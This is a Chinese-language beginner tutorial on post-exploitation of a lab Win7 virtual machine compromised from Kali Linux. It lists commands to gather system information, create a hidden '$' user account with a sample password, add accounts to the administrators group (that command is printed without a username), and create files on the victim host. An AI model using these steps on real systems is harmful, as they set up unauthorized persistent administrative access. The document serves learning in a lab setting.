一、背景介绍
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3.1 对拿下的Windows主机进入后渗透阶段,具体操作如下图所示。
步骤1:运行漏洞利用模块,如下图所示。
命令:run
步骤2:进入Windows主机的cmd窗口,如下图所示。
步骤3:利用命令查看受害者主机的系统信息,知己知彼对目标受害者主机进行更全面的掌握,更全面的控制目标主机,获取更全面的信息,如下图所示。
命令:systeminfo
步骤4:受害者主机的系统信息如下图所示。
3.2 对受害者主机进行用户管理操作,如下图所示。
步骤1:给受害者主机添加可以隐藏的用户信息,如下图所示。
命令:net user 新用户名$ 用户密码 /add
例子:net user admin$ 12456 /add
步骤2:查看刚才添加的新用户,如下图所示。
命令:net user(因为新建的用户为隐藏用户,所以命令行查看不到该用户)
步骤3:添加不隐藏的新用户,如下图所示。
命令:net user 新用户名 用户密码 /add
例子:net user admin 12456 /add
步骤4:查看刚才添加的新用户,如下图所示。
命令:net user
步骤5:在受害者主机中利用图形化界面查看刚才新建的用户,可见在该界面是可以看见新建的隐藏用户的(如果需要实现真正意义上的隐藏用户的话需要更改注册表,请持续关注本号后续讲解)
步骤6:删除用户,如下图所示。
命令:net user 用户名 /del
例子:net user admin /del
步骤7:将新建的用户添加到管理员组,如下图所示。
命令:net localgroup administrators /add
步骤8:查看管理员组的用户,如下图所示。
命令:net localgroup administrators
3.3 对受害者主机进行文件操作,如下图所示。
步骤1:新建文件夹
命令:md 文件名
例子:md abc
步骤2:删除文件夹
命令:rd 文件名
例子:rd abc
步骤3:新建文本文件,如下图所示。
命令:echo 文本文件内容 > 文件名
例子:echo hi you are hacked > hk.txt
3.4 对受害者主机进行查看主机名操作,如下图所示。
命令:hostname
页面更新:2024-03-24
本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828
© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号